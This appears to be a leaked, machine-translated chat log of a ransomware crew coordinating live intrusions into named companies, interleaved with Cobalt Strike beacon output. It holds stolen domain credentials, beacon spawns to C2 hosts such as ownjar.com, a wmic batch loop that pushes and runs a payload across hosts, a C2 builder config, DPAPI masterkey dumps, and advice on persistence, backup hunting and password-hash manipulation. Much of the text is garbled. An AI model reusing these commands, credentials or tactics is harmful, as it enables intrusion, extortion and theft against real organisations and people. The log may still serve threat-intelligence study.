          dir 12/08/2020 23:32:35 Recovery
          dir 12/08/2020 23:32:28 System Volume Information
          dir 12/08/2020 23:32:35 Users
          dir 11/17/2020 13:36:48 Windows
          dir 12/08/2020 23:32:35 Zabbix_Agent
 375kb fil 07/16/2016 07:18:08 bootmgr
 535b fil 12/08/2020 23:32:33 BOOTNXT.HWOEU
 16gb fil 11/17/2020 13:46:41 pagefile.sys
 1kb fil 12/08/2020 23:32:33 readme.txt
 40mb fil 12/09/2020 08:06:26 redcloak.msi

beacon> ls \\\admindc5\c$
[*] Tasked beacon to list files in \admindc5\c$
[+] host called home, sent: 31 bytes
[*] Listing: \admindc5\c$$

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 07/11/2019 13:42:13 $Recycle.Bin
          dir 12/08/2020 20:24:33 $SNAP_202012020302_VOLUMEC$
          dir 12/08/2020 20:24:33 AdminDC1
          dir 12/08/2020 20:24:33 ck-agent
          dir 10/29/2018 09:48:27:27 Documents and Settings
          dir 12/08/2020 20:24:33 iboss-ad-installers-110818
          dir 12/08/2020 20:24:35 Logs
          dir 10/29/2018 14:45:30 PerfLogs
          dir 12/08/2020 20:24:35 Program Files
          dir 12/09/2020 02:48:53 Program Files (x86)
          dir 12/08/2020 20:24:35 ProgramData
          dir 12/08/2020 20:24:36 Recovery
          dir 12/08/2020 20:24:28 System Volume Information
          dir 12/08/2020 20:24:36 Users
          dir 12/02/2020 02:48:40 Windows
          dir 12/08/2020 20:25:25 Zabbix_Agent
 375kb fil 07/16/2016 07:18:08 bootmgr
 535b fil 12/08/2020 20:24:33 BOOTNXT.HWOEU
 16gb fil 11/13/2018 11:25:20 pagefile.sys
 1kb fil 12/08/2020 20:24:33 readme.txt
?ls list of dk check themya now on azuredcdk is available?
beacon> ls \\\dhcp02\c$
[*] Tasked beacon to list files in \\dhcp02\c$
[+] host called home, sent: 29 bytes
[*] Listing: \\dhcp02\c$$

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 04/22/2016 01:52:17 $Recycle.Bin
          dir 12/08/2020 23:09:27 clu
          dir 12/08/2020 23:09:27 compaq
          dir 12/09/2020 11:37:37 Config.Msi
          dir 12/08/2020 23:09:27 cpqsystem
          dir 08/22/2013 08:48:41 Documents and Settings
          dir 12/08/2020 23:09:27 hp
          dir 08/22/2013 09:52:33 PerfLogs
          dir 12/08/2020 23:09:27 Program Files
          dir 12/09/2020 02:49:13 Program Files (x86)
          dir 12/09/2020 12:55:15 ProgramData
          dir 12/08/2020 23:09:22 System Volume Information
          dir 12/08/2020 23:09:27 Users
          dir 09/21/2020 10:12:03 Windows
          dir 12/08/2020 23:09:27 zabbix_agent
 389kb fil 09/30/2013 15:37:02 bootmgr
 535b fil 12/08/2020 23:09:27 BOOTNXT.HWOEU
 5kb fil 12/08/2020 23:09:27 cpqsprt.trace.HWOEU
 3gb fil 06/01/2020 10:32:41 pagefile.sys
 23kb fil 12/08/2020 23:09:27 PHH_wirless2.txt.HWOEU
 1kb fil 12/08/2020 23:09:27 readme.txt
 40mb fil 12/09/2020 08:06:26 redcloak.msi
 3kb fil 12/08/2020 23:09:27 smh_installer.log.HWOEU
 615b fil 12/08/2020 23:09:27 zabbix_agentd.log.HWOEU

beacon> ls \\kms\c$
[*] Tasked beacon to list files in \\kms\c$
[+] host called home, sent: 26 bytes
[*] Listing: \\kms\c$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 09/15/2018 01:19:00 $Recycle.Bin
          dir 03/30/2020 09:58:18 Documents and Settings
          dir 05/29/2020 10:17:56 PerfLogs
          dir 12/08/2020 20:58:12 Program Files
          dir 12/08/2020 20:58:12 Program Files (x86)
          dir 12/08/2020 20:58:12 ProgramData
          dir 12/08/2020 20:58:12 Recovery
          dir 12/08/2020 20:58:07 System Volume Information
          dir 12/08/2020 20:58:12 Users
          dir 05/29/2020 10:17:57 Windows
 1gb fil 05/29/2020 10:18:36 pagefile.sys
 1kb fil 12/08/2020 20:58:12 readme.txt

beacon> ls \\\hyperv24\c$
[*] Tasked beacon to list files in \\hyperv24\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\hyperv24\c$$

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 12/08/2020 22:10:00 Avamar
          dir 11/06/2020 08:02:07 ClusterStorage
          dir 11/05/2020 16:57:08 Documents and Settings
          dir 11/06/2020 07:32:25 PerfLogs
          dir 12/08/2020 22:10:00 Program Files
          dir 12/09/2020 09:05:16 Program Files (x86)
          dir 12/08/2020 22:10:00 ProgramData
          dir 12/08/2020 22:10:00 Recovery
          dir 12/08/2020 22:09:56 System Volume Information
          dir 12/09/2020 09:04:58 Users
          dir 11/06/2020 07:55:21 Windows
          dir 12/08/2020 22:10:00 Zabbix_Agent
 839b fil 12/08/2020 22:10:00 NWT_hotfix_report.html.HWOEU
 526kb fil 12/08/2020 22:10:00 NWT_Install.log.HWOEU
 384kb fil 12/08/2020 22:10:00 NWT_Nimble_DSM_Install.log.HWOEU
 19gb fil 11/06/2020 07:57:46 pagefile.sys
 1kb fil 12/08/2020 22:10:00 readme.txt
 40mb fil 12/09/2020 08:06:26 redcloak.msi


Checked 3 everywhere is the riddimi, but check something nearby under the creed DAOK) all or those who have a jam on the current? A long time we have not been with you this format) you have about 1.5 hours to work on the current, then give access to the cobu and there again will be parsed to work ` `.
 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 10/09/2020 09:34:10 $Recycle.Bin
          dir 07/10/2020 13:27:44 Documents and Settings
          dir 12/08/2020 23:33:21 $Packages
          dir 07/10/2020 12:14:14 PerfLogs
          dir 12/08/2020 23:33:21 Program Files
          dir 12/09/2020 08:44:13 Program Files (x86)
          dir 12/08/2020 23:33:21 ProgramData
          dir 12/08/2020 23:33:21 Recovery
          dir 12/08/2020 23:33:16 System Volume Information
          dir 12/08/2020 23:33:21 Users
          dir 07/21/2020 11:40:36 Windows
          dir 07/20/2020 14:24:04 WindowsAzure
 380kb fil 11/21/2016 00:36:43 bootmgr
 535b fil 12/08/2020 23:33:21 BOOTNXT.HWOEU
 1kb fil 12/08/2020 23:33:21 readme.txt
``ridd is[ ](https://mediaeveryone.com/channel/general?msg=yaydbDsTYtNmBckJn) and check the root of the disk Snetu I have, everything is empty, cleared recently kobuodnaa do you have many live sessions in sisd? judging by the chinese cmd far traffic flies)session by the way at slip 5 response minutes have not tried all past or not tried?other than ms17? now i will try to scan this computer for ms17>none of them is LA, no credits where? i wrote in lpe direction what?[ ](https://mediaeveryone.com/channel/general?msg=7i8e3ue3CvTy5Mhti) in general here are all users on one computer, none of them is not LA, domain is not responding, no configs ipn, balloon, no creditspoka no question - can coba clean from sisd.net sessions?[ ](https://mediaeveryone.com/channel/general?msg=zfdbDky5Ae6mwQgxR) octe who asked for wps under the msf - in the afternoon if no questions, If you have any questions then let's get to work good dayHi all hellohitobi pizda)Morally I'm with you guys) and optimize the actions to reduce unnecessary and uselessnu finalize / reprocess all my hard drive from the "working" roughly related to the development of copyright full tulkit which we sawmy now do a channel one thematic
can for half an hour will be distracted for a small discussion, and you guys are all here now? projection of the logics prescribed in the DUs and groups to the results of scans from different points-try to understand the logic of the location of "hardware" that blocks the ports
it can be in the physical location, functional purpose, destination "by department", just an iron between the server and user segments
often these networks have many DCs and subnets are isolated from each other but no domain controllers for successful replication and almost never on the "tech machine" they put phasers on the segments and look for a route correct solution administration of network firewalls that prohibit incoming connections and not the fact that it will skip all the same but this will hardly work because ntlm relay in its current state can "hit" only another machine other than the one from which initiated the connection spuf some not just to make it work but to make the authorization from this machine.
all ports closed? all ports closed?
but we were able to break into the session
```
in the "outgoing" session? i have a question, why not do the bind? not yet work in the ones that were, but if there are new ones - wait for it) nowhere? there is no yes where yes? 2 grids close to deadlocks is there to work? longHow are you? helloToday the ceiling is still an hour, prepare a lack of data, tomorrow for lunchso I need to go away on business, I understand that there is something to do, write, if I can help what to tell - I will definitely advise when I return://www.stellarinfo.com/blog/exchange-mailbox-backup-using-powershell-cmdlets/?то are conditional technicians a couple .pst pull and ommm
no clue... I usually just downloaded the target boxes through EAC@tl2
question on
>3) a backup of the mail server
so i had a server named `Exchange.rtpco.local`
I go to `C:\Program Files\Microsoft\Exchange Server\V15\Mailbox`
and i download that hereff twitch, chromium will not decrypt without masterkeyypodderderzhayut browsers at the admins carefully without cobalt sesikarbon - fact, well, they also do not have exchendge, i need to look for mail on #evo-com there everything is ready except two nas in vokrrup, they should look in the admins browsers, we have looked there only fs and ff, since.We have not jumped anywhere on the machines, worked from the dedicat on the vpnom. Cabron sees everything, so if we jump somewhere, it will count down and on the same day it has to be closed. And the time there is - 11, so we have to start somewhere at 9 - 10 in the morning.Today in general, the idea of three-toni have not yet come it to @user3 and @user9
they seem to be working with this grid on #evo-com. how's it going? hi.
on #rtpcompany-com.
found a bunch of esxi's that they didn't find last time, and some creeds for them, kinda left to finish the additional tasks (skul, exh, etc.)

on #waterway-com.
I've still not picked up the nimbles' credentials, they seem to pass them on a piece of paper, the IT guys have keylog, one of them tried on Friday and could not get to nimbles, then got into lustpass and self-locked there podskazite what progress was at the end of last week on the current tasks@tl1 today is absent - so I substitute all hiAnd write yourself a mindmap to raise the rights from LP to DANa write a detailed report on the work done in the last 2-3 days in the LS. While you can take care of organizing entries for modules and other things, as well to write a manual to himself on all the vectors that were and in what order is better to act. Finish at 20:00 todayhttp://fixmypc.ru/post/kak-naiti-zaloginenykh-polzovatelei-aktivnye-s-s-powershell/if the `beacon_reverse_tcp` load works in `Windows Executable (S)` which went through `shellConcatenation.1.0.0` but it does not work through `rportfwd` most likely the problem is in `rportfwd` itself[ ](https://mediaeveryone.com/channel/general?msg=mQY8BtgM65Eh6Tpz6) and checked on a normal https sheet? or already on rportfwd? and what do not like `Attack -> Packages -> Payload Generator`? it is 255 times larger Yes, but not sure that `shellConcatenation.1.0.0` itself supports such file size RAW) and about `rportfwd` not quite understand
```
beacon> help rportfwd
Use: rportfwd [bind port] [forward host] [forward port]
     rportfwd stop [bind port]

Binds the specified port on the target host. When a connection comes in,
Cobalt Strike will make a connection to the forwarded host/port and use Beacon
to relay traffic between the two connections.
````Windows Executable (S) - RAW ` is a stageless variant, namely when you do RAW through `Attack -> Packages -> Payload Generator ` you make an intermediate file that after launching it downloads the working code of the coba itself, in `Windows Executable ` immediately goes this working code, without additional paginghit then until lunch, work with it all together + from sessions only MATCHES?Good morningGood morning everyone, I'll be right downThelepathic? Don't get it dirty, just be careful, it's paintedDo the door mighty🗿There's a forget-me-notsGood morningGood morning, can I go there too?
skytechinc.com
``@user9 - prepares the network and still hasn't given me an external domain for the conf
@user7 - #corp-televisa-com-mx
@user8 - gave me a VPN
@user3 - gave me a ripcord
@user4 - gave out a vpn, kznm[ ](https://mediaeveryone.com/channel/general?msg=fue3bjcmbBoFoLAFL) ԛ so he's deadbeat, he@user9 is busy with the network, he's preparing to close outm me - definitely not caught? I don't think so They had no password manager setup on solara[ ](https://mediaeveryone.com/channel/general?msg=h4E8itvspTabEgzud) that's what? #ballymoregroup-com
there were two nasal passwords, one didn't work
2 backups of the server with the listings removed.
looked for a sphere
then it crashed
first came back, knocked out the first us, changed passwords, then it crashed
then came back machine that does not have access to the domain, from vpn no configs, no kred, stood keylog, did not catch anything checked mp?sccy collected browsers from ALL computers, no thresholds already not the first day with them on sccy and ballymore write that done (remember, vpn can not turn on without a confirmation code, they have 2fa) was in work ѕssession aliveDetached from the companyDetailed to take a new onevsm gone?if there's something to take, i'll take it, i've got a guy who left #corp-televisa-com-mxsccyballymore fell off
i'm sure no one from the office came in either, but you'd better change it while i'm with user7
i'm late, who came at all? did everyone sleep at home? did i ask my friends about their domain?
```
01/28 12:07:45 *** sup has joined.
01/28 12:10:25 *** sup has left.
``not``.
sup beacon> exit
[*] Tasked beacon to exit

``@tl1 are you out of all sessions in the cob 172....218? Hi all, tomorrow to 5login_passwdlogin_username in snu.edu trying to get out of the vpn
i'm trying to get out of coppers with SMBGhost and a bunch of different rdpplots i tried - all bypassed how to order salt on hydra there) i don't know about hydra) i'm trying to figure out hydra in #corp-televisa-com-mx trying to break into any car@user9 for a long time went to the long distance to sort out with the hydra with the hydra to sort out with the hydra how to brute web formulas another way to brute the web with the hydra sort out without + what are you doing) - brute everything will be in sccy?++ssssssssssssssssswho's busy? http://helpdocpt.club/threads/some-cool-stuff-%D0%A1-pws-cna.38/ Since I was allowed into the garden - otkommentil part of the topic, I propose my modest remarks right in the first message that did not have to read the whole thread can we chat at least?the task for both teamstoday until 21:00, if you do gpj you can go earlieryou will now be active practice is just with the aim of increasing rights, there will be cases where you will need to learn new things, where the standard methods will not work, and they just should be systematically addeda tangle I think no problem, this is still a relative such "order" of action, the question shortcut'a here
that is, the allocation of priority vectors and then secondary and tertiary - that is more difficult to exploit and less common in any case looks confusing because, for example, the previous version of the diagram was difficult to bring to a sensible form For infinite most likely you will have to move to another platform or present it in a different wayThe given meinmap is essentially the basis of the whole cycle of actions possible, that is, you can extend almost to infinity)then just vectorly develop with indication of used vulnerabilities (both LPE and network ones)
the MsSql vector as a whole what to add I understand you already "see"? but the beginning is correct, yes)) but promises without naughty) i can give you my account (please send login in PM under which you can read) mind-map remaster
http://helpdocpt.club/threads/mind-map-%D0%BF%D0%BE-%D1%8D%D1%81%D0%BA%D0%B0%D0%BB%D0%B0%D1%86%D0%B8%D0%B8-%D0%BF%D1%80%D0%B8%D0%B2%D0%B8%D0%BB%D0%B5%D0%B3%D0%B8%D0%B9.33/актуалочкаһттрѕ://www.xmind.net/download/До lunch continue yesterday's task on mindmap and organizing instructions:space_invader:hiiGood morningGood morning,good morning,good morning,good morning,good morning,can you tell me in this what's her `pinellas.local` and me?[ ](https://mediaeveryone.com/channel/general?msg=AwPNpZh9xSPnH2kZE) yes, in lss thanksGood morning,can the new koba
Mine got busted.
there were two nets closed:space_invader:hiv turned on)didaHellouser8 should be turned on, it's backhhiHi, where is everybody? goodnight tomorrow by 5but also nowhere to go, are there citrix adminspolzak groups - yuzak?
or servers? any other groups? in #corp-televisa-com-mx moved from the entry point
No, checked all the servers and cars where there is access, from the user segment of the servers have not yet been able to get out what have you done today?
AnyDesk autoupdate#39932 20/01/2021 05:31:07 p. Listo
pjfrancocru sfe16537 corp.televisa.com
the context of the usual unconcerned username.
aha, delete deleted, left? i just do the build and delete after downloading i will say for sure delete their last deleted log saves? ahyhaxmasaka but i see in the logs only 2 builds have fixed 3 pieces again the same does not understand to have to get out on another car to fix that logical first work out those with - myself will fix me okponjalta the same crap[ ](https://mediaeveryone.com/channel/general?msg=b7uTJGwpAAPqPF7uW) and I only interacted[ ](https://mediaeveryone.com/channel/general?msg=KNnZDaj5uGyeJmFNs) through injecting into the neighboring process from the process only in another session with the car was possible to work I have such crashes only spawn and curedcobalt crashesinteract how? you write spawnfinancial.localbenihana.com not attached
247InTouchPCl.local is minus, you've been messing with it, nobody touched it anymore
cedarfinancial.local crashes kobutut we work the rest of them in netsnu where 2 other people work? if the old one removed - ok I told @user8 the old one extinguished sccy-lt04 sccy.com you put 2 builds here?[ ](https://mediaeveryone.com/channel/general?msg=KTsDPaLzaBZtfH7EX) is[ ](https://mediaeveryone.com/channel/general?msg=xbWP52aMQTtnX34cp) how to restart?
usac context
dough sccy-lt04 sccy.com
Microsoft Teams autoupdate#81727 1/20/2021 6:15:52 PM Ready
``[ ](https://mediaeveryone.com/channel/general?msg=Euqwmkbt9wtAhdJid) this netsch I restart in sccy.commoya? 3 pieces and 1 did not arrive? everything? agadall in place? yeslf old deleted? rebuild done?)[ ](https://mediaeveryone.com/channel/general?msg=k5rvLkBNzcF4RimTH) Microsoft Teams autoupdate#15903 20/01/2021 05:06:56 PM Listo[ ](https://mediaeveryone.com/channel/general?msg=iqCETTGajeCX9rTuM) netusogr.televisia.com.mx 10.170.4.168 pjfrancocru SFE16537[ ](https://mediaeveryone.com/channel/general?msg=qo75xSCiBZEqdcN35) is
user context
occdr occremote191 nk.spirit.com
Skype maintenance task#13547 1/20/2021 6:07:49 PM Ready
``Thank you, there's another thing``midwestsign.com 192.168.11.166 jkielsa CTXA715-04[ ](https://mediaeveryone.com/channel/general?msg=LmhG5G4tPR6HmBu8L) there is such a `CTXA715-04` I need external domain + rights type (system, user), hostname `Mitel autoupdate#82604 ` fix it isnu bluntly of course, I gave you several builds and the rule was not canceled + you gave access to do them Н number you and gave several builds, just did not compare + hurry up as many times I told: 1 build 1 run anyway redo faster technical details why? you were told to do so, you should have asked right away...if id then it is understandable.... i don't know if you could just give out 1 dll for all domains and not bother with the toolpanelthat's the point of generationeach build is unique and it has its own id. why? they still knock on the same domain? i also asked if you remember how to do it in ahuedll and shtasku and delete all the old ones need at least 4 builds now a new build and fix[ ](https://mediaeveryone.com/channel/general?msg=rxocXEpBqPrxag3c2) i'm still waiting for an answer i see in the toolbar that the last build built 1.5 hours ago have you forgotten that 1 fix 1 build? i will ask a very simple question + mount the same build ...?tell me how long have you been bindinfinancial.local1 = Skype autoupdate#35434 1/20/2021 5:38:26 PM Ready``?
192,168,0,2 Hgutierreze SFE18491 CORP.TELEVISA.COM.MX
McAfee autoupdate#45234 20/01/2021 04:34:49 PM. En ejecución
``+ are you building on both domains yes? corp.televisa.com.mx 10.170.4.168 pjfrancocru SFE16537[ ](https://mediaeveryone.com/channel/general?msg=YjxfWdJLDuKfhcQEJ) 2[ ](https://mediaeveryone.com/channel/general?msg=nJ8rdQuMvHZMhNpY6) 1 so far yes. about by which are they?[ ](https://mediaeveryone.com/channel/general?msg=TfnbXH6dmoi4kytp6) ?`sCTXA715-04` never arrived ?all dll are there and staska too?so far, both passed `midwestsign.com 192.168.11.166 jkielsa CTXA715-04` as @user7koba hung up with this session u9 in solo mount? nk.spirit.com 10.0.0.20 occdr occremote191 any other mounts? which were previously mounted also mark the process, there was a little snack something mounted?so where there is no anchor-where anchored write + the first character in the Note the main anchor possible in which coba is the difference? in the input can? but you have access to the builder before i did) clearly, just did not do so before you are not going to work only with 4 networks?there's not 1 to 1 if all i did not understand, we need to fix all nets or only your own? only 2 nets what else is fixed? add comments in the input coba corrected above message in the general coba do mark what is fixed there, i shoot hell you do spawn@user8 look activity session you need as many nets fix or do not do it right?
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] tmevtmgr.sys Found
[+] TMUMH.sys Found
[+] 2 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] Trend Micro Inc Found!
``````
====== AntiVirus ======

  Engine : Trend Micro Apex One Antivirus
  ProductEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\Pccntmon.exe
  ReportingEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\NTRmv.exe

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

  Engine : Trend Micro Apex One Antivirus
  ProductEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\Pccntmon.exe
  ReportingEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\TmListen.exe
``what's up with the av? no deletion of the deletion to fix and it's not flying to my coba what domain? long but it's not flying yet what? ``Adobe SvcRestartTask#20900 1/20/2021 4:10:24 PM Ready ``what's the name of the task?stask? dudl in place? yes, I made a new one and fixed it with the same build?[ ](https://mediaeveryone.com/channel/general?msg=kMNDp3SkYZuKMzv6f) I don't see10.0.0.59 system* sccy-05[ ](https://mediaeveryone.com/channel/general?msg=GeQz5F9CRCzqu5fkx) I have this domain, marked another session is taken and not signed ``
Teemo beacon> spawn u7
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (rawint.com:443)
[+] host called home, sent: 840 bytes
``We're losing our job, we don't know it in the shower, but it's empty``.
Teemo beacon> spawn u7
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (rawint.com:443)
[+] host called home, sent: 840 bytes
Teemo beacon> spawn https
[*] Tasked beacon to spawn (x64) windows/beacon_https/reverse_https (ownjar.com:443)
[+] host called home, sent: 261643 bytes
``guys I'm really asking you to mark the taken sessions work and is fixed? main.crispregional.org I opened the conf, no conf) if there is a conf, can you add the fix okkonf? fix is okkonf, ie, it was not marked I took it, and so is it ``
192.168.0.2 SYSTEM* SFE18491
CORP.TELEVISA.COM.MX
```
``CORP.TELEVISA.COM.MX\Hgutierreze R8WTksIOle1rP8)P and you can create a group with this domain ``
10.1.111.100 jgemperline BEN1064-MGR-10
benihana.com
and more external domains please write[ ](https://mediaeveryone.com/channel/general?msg=Ct9XShzSPimmfyrK5) +a, everything. see the file and stack173.234.155.15 192.168.75.175 https SYSTEM * CRRHORC19 no such thing... SYSTEM * CRRHORC19... system and company name or domainname... I need hostname?
SYSTEM * CRRHORC19okay. then you do not bother[ ](https://mediaeveryone.com/channel/general?msg=3BXgDHmQC8hAECd5s) For now, yes, I need to prepare labo for tomorrow, but I'm around) everyone okay with the builds? if there is a domain at once adminoperatively collect hashes to brut for @tl2 and do as @user9shall switch module[ ](https://mediaeveryone.com/channel/general?msg=fypApjmJxLdv9EZf6) yes, it worked@user3 you're not with us yet, right?
{
    { "domains": [
        "kalarada.com",
        "tuxomibo.com"
    ],
    { "bit": "x64",
    }, "period": "15",
    { "lasthope": 65
}
``didn't helprelogin tried? give parameters from show? the same crap no download not a single marked sessionwhere @user3 @user7 ?fix promptly or you stupidly have nothing to work with and domainsvtoolpanel updated bildraskid now fixes to entry pointsnot marked, in the entry coba alive not marked any sessions in the input? 2 people and one has a dead sessionyou have windows, all do not bind me?
```
 4836 924 naPrdMgr.exe
``Then what av? elfkbkfcmdaa must be in the folder after the start? I don't see2 min2 vby amongst the tocscscs ``
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Adobe Acrobat Update Task 1/21/2021 1:00:00 PM Ready
AdobeGCInvoker-1.0 1/21/2021 8:06:00 AM Ready
G2MUpdateTask-S-1-5-21-1989139100-303601 1/20/2021 2:38:00 PM Ready
G2MUploadTask-S-1-5-21-1989139139100-303601 1/20/20/2021 3:47:00 PM Ready
OneDrive Standalone Update Task-S-1-5-21 1/21/2021 11:04:46 PM Ready
is ``[ ](https://mediaeveryone.com/channel/general?msg=MnXjJmjcc5SNGbCHi) is there? already read above)) without YES[ ](https://mediaeveryone.com/channel/general?msg=g6oErPtYMLQZGn8bp) still yes no session 173.234.155.15 192.168.37.115 https amypriest CRRHHHCC4did you spell it?[ ](https://mediaeveryone.com/channel/general?msg=wPganWRj5HC2WAB5q) where is it? then the session fell offcrackDa@all anyone here?which are already there are 2 domains can be so that several sessions from one network always check the domain now mbe domains will change do not run) before starting tell where you start so by the classic anchor entry points know how to start do you know how to do the last just 65interval from 15 to 20 just check both domains questions how to use any?+ see the new toolkit? made you a new section in the toolkit would be very good at once up to YES and fix it) dismantle? one is) empty...entry coba``
192.169.6.82
https://ownjar.com
----------------------------------------------------------------------------------------
185.150.190.153:49698
9AR3B4a2bORZSN28ST8wLqbH0F0Wvo5buE2
``Be distracted for now, coordinate with each other and to the confabulary clarifying questions and logs on the work to try to close today let's all work on balimore fivea where @user9 ?@user3 off waspoca 4 how many you? balimore will spin, search nasa backups and stuff like that?i can't find it, i can't find it, i can't find it, i can't find it, i can't find it, i can't find it, i can't find it, i can't find it, i can't find it, i can't find it, i can't find it, i can't find it, i can't find it.
minimizes bugs under the token not plus I would add YES crosses to run vmice just in case change it to cmd / ok, got it, remove gzpnez run what is "run" anyway? run why?) and tweaked it incorrectly therec:\starter.exe and by the way, better copy directly to the root
wmicexec_command (can't remember the exact name of the msg module, but something like that)
they both even take hashes if you don't have clears at hand in any way.Then run them you can just spread the "first part" of the batch files you can also psekzekomno you can vmik by YES
this will "go" easier
vmik really will not run from the systema stask is necessary? vmik will not run this exeсhnik easier? the second part where sstask - awfulnapernaya part okv files i had it from somewhere nu okainet.no? it like right on the mdsn there.so you wrote it you at least read the syntax schtasks ?some nonsense in will not live itself? `` ``
for /F %%i in (C:\ProgramData\hostlist.txt) do @ copy C:\ProgramData\starter.exe \\%%i\C$\Windows\System32\starter.exe && wmic /node:%%i /user: /password: process call create "cmd /c C:\Windows\System32\starter.exe" && ping %%i -n 3 >> .\ping.txt
``@tl2 add me in fusionfirst.local+slypad flewKidai, we have to wait until the working day in texas is over.
because we're already falling asleep, my head does not work ... and in general, what I meant about "sensitive" network - rather a serious monitoring events, where the whole network is covered by EDR agents, monitoring systems, and other bugs and again ... hack is a thing "not static", something will close - something will open which is little different from the real hell Azure clouds just provide right out of the box their Azure-ADmicrosoft is moving towards the introduction of their clouds in the first place if we talk about "not a small" gridwith these settings it's impossible to administer roughly speakingthis network simply will not work@user1 what you described is not possible in practiceespidate the enemy freeze and lagmas are still a little too much work with "sensitive" networks - but when it comes to these ... in general, you already understand that you can "break everything" even with a VPN. and sometimes this is the only method ... there will be many cases where it can be used outside the context of specific users by manipulating even remotely the file system and domainmogranomogromnuyu plus, here guides are inappropriate slightly such "direct" because it is one of the key storage mechanisms of kredevo
the essence of DPAPI attack this is a question you should ask yourself)))) rhetorical question:grin:fuck, I spent all night this masterkey and did not get anything in the end, throw all in sprouselawdobavl) tell me who to add to this confab it's time to add all of us to this confab so no one there did not dovabile chet@user7 if it applies to any grid - please throw in the appropriate confabstealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM/mimikatz is it able to change back to known? no, password ok. but how to change the hash?
you can do it with .
you can just go through the kmdata I don't know where to go more))
change
user
password)
lol
or the question is how to do it more convenient? and can you elaborate)) on the hash that he had change then go back to him underneath 1qwerty1 I searched for configurations, did not find (you can set the user ntlm hash of any known cleartext password `` ``
so you're looking for a cleartext, plus you can set your password hash to a user and then change it back
```
i think i wrote it clearly.config searched for password plus'a itself? under the right user can not log in under ntlm and deployment in your own place and full download the folder with the client there are a million variants that "no"? on rd tried to go where the client stands?
if it's not possible to erase it, then it's not possible to enter where the client is standing, so look for cleartext, plus you can set your password hash to the user and then change it back no cleartext from rdn and no connection via ntlm? the client that sends@user9 to the cloud with web authorization? with the cloud - look for cloud and treem there - everything is simple here
If you can't overwrite it, it means there's nothing on our network yet...
all the computers have been searched, people don't leave passwords in chrome files
there's Passwords Plus - they store passwords there, but it's in the cloud and you can't get it BUT you can fight them, they might be available through some interface and you can overwrite all the tapes, there's even a demagrid function in the closet sometimes) this cold tape backups is probably the hardest, and often impossible to solve and they usually have EVERYTHING related to av/backups/directories of servers. most often all this is managed by 3-4-5 people even in large networks the main and most important!
the most important thing is to study the contents of the tacs/howdirs/browsers of the IT people. Only with experience will you figure out how to work with them. just read the docs...veeam, acronis, ironmount, etc. practically everywhere +- same backup is used in general, as for the backup@user9 yes. here's an example of a fucking backup
well get it yes, java gobbling up. decide 4 gb max 2x24x4 cards? comps are ancient ugu16 gig total? ddr2?????? we have ddr2 at 4g slots no more. and some mothers do not support more?
```
Acronis Backup 11.7 Management Console 11.7.50058
"Worse than Explorer on Windows
Okay, I heard about the RAM, but it's faster. The fucking RAM is eating everything. I'm running out of RAM. What does System Load show? does it gobble up RAM?
URL : https://cloud.malwarebytes.com/ ( https://cloud.malwarebytes.com/ )
Username:
 * Using CryptUnprotectData API
 * volatile cache: GUID:{de823842-69eb-4af0-a1b0-d6b9625b796f};KeyHash:883bc94ae7ab70b09830fab37259abfc3cdf7fc9;Key:available
 * masterkey : 51a6f051e98d0d633d79bacbb355e3a5712c4f8a14f31fe332bb587047635a22e19cce783bb6cf8927eb9b590159f059e069a26186ce651e3aba7db2481f04d1
Password:
```

```
URL : https://cloud.malwarebytes.com/ ( https://cloud.malwarebytes.com/ )
Username:
 * using CryptUnprotectData API
 * volatile cache: GUID:{2539f04d-b7c0-487a-97d8-c818e2889122};KeyHash:003f69a0852d9f879bebbfe1aaad91d7fcac9b34;Key:available
 * masterkey : fa0ee6549e47088279eafd681cc050d2f5f15a2618d818c9f286532ceeef0c10aaf31c26d4d4a5d1e226380e383a8626fd1cbaf4d165e47a75791a809adb682a
Password:
```

:zany_face:Computers hang demonically! You can not just open the kobu browser and notepad!
`8. you have three now, do you need more? if so - tell me which servers and how many you need `as needed so, gentlemen, on questions

1. smb_login with creeds on DK / net use on DK / login to outlook or webmail (if domain authorization is tied) / ldap_login (https://github.com/lanjelot/patator) e.g. by patator
2. First part - rudimentary LM hash, you can safely forget about what it is we have and will always be the same, the second - NTLM hash, actually the one that we use often for authorization
3. will be later, you can set up tasks through the admin interface for hash decrypt and bruteforce passwords/docs/excelniks
4. https://github.com/0xthirteen/StayKit - all the fixing techniques are described here and divided into categories and levels of privileges, there's nothing to describe here in more detail, there are no "unique" techniques for the Windows systems for years. There are alternative things such as web shells on web servers (this is aspx code which is placed on the webserver, in this case IIS where the functional application "lives" - most often and most conveniently placed on the exchenge), there is an IIS module. So far, stop at stay-kit'e because it gives insight, in the future just give you a handy tool to fix it simply by running a dll
5. everything on the network is administered by people. the key to getting the most detailed data on the studied IS is in the admins / network engineers. That includes digrams and accesses and everything else. You can only use them to identify cloud or taped backups or circumstantial evidence (services/tasks on critical servers, hell records, etc.).
6. the question is incorrect. it does not "need" to do, smb_pipe is essentially just a kind of load which is +- technically equal to bind paiload in metasploit, used for machines with authorization restrictions or for machines unable to give access outside the standard http(s)/dns/tcp protocol, that is jump psexec(_psh) 10.0.0.1 pipe is a service creation for bind pipe which then connects the initiating machine
7. give you the builder of the dll files
8. You now have three of them, you need more? If so, tell me which servers and how many you need
9. Why does it hang? I do not know.
192.168.100.240
192.168.100.238
192.168.100.248
192.168.100.237
192.168.100.245
192.168.100.230
192.168.100.219
192.168.100.228
````SPROUSELAW\administrator 1ylft1tmtS_6963 ``All right, I've been kicked out of the new rocket, I'm alive now``.
+] Checking URL https://50.233.57.77
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.0-14sv

